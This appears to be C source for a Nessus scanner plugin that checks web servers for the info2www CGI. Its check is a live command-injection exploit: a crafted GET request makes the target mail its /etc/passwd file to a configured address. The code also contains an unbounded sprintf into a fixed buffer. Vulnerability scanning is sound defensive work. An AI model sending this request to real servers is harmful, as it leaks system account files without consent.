#include <config.h>
#include <nessus-devel.h>
#include <nessuslib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h> 


#define NAME "info2www cgi-tester"
#define DESC "This plugin determines whether the 'info2www' cgi \
is installed on a remote computer. This cgi allows a remote user \
to execute any command on a given server"
#define COPYRIGHT "ported by Renaud Deraison"
#define SUMM "determines the presence of the 'info2www' cgi"


int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}

int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	if(host_get_port_state(args, 80)<=0)return(0);
	
	
	if(is_cgi_installed(args, "info2www"))
	{
	char * buffer;
	char * result;
	char * email = get_preference(args, "email");
	int soc;
	if(!email)
	{
	 post_hole(args, 80, "The 'info2www' cgi is present, but could not be tested\
 because you haven't set an email address in nessusd config file");
	 return(0);
	}
	
	soc = open_sock_tcp(args, 80);
	
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'info2www' cgi is present but could not be tested \
(could not reopen the connection to port 80)");
	else {
		buffer = emalloc(500);
	  	sprintf(buffer, "GET /cgi-bin/info2www?'\
(../../../../../../../bin/mail %s </etc/passwd|)'\n", email);
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 500);
		read(soc, buffer, 500);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'info2www' cgi is installed\n/etc/passwd sent to %s\n
Solution : upgrade", plug_get_hostname(args));
		efree(buffer);
		post_hole(args, 80, result);
		efree(result);
		close(soc);
		}
	}
	return(0);
}

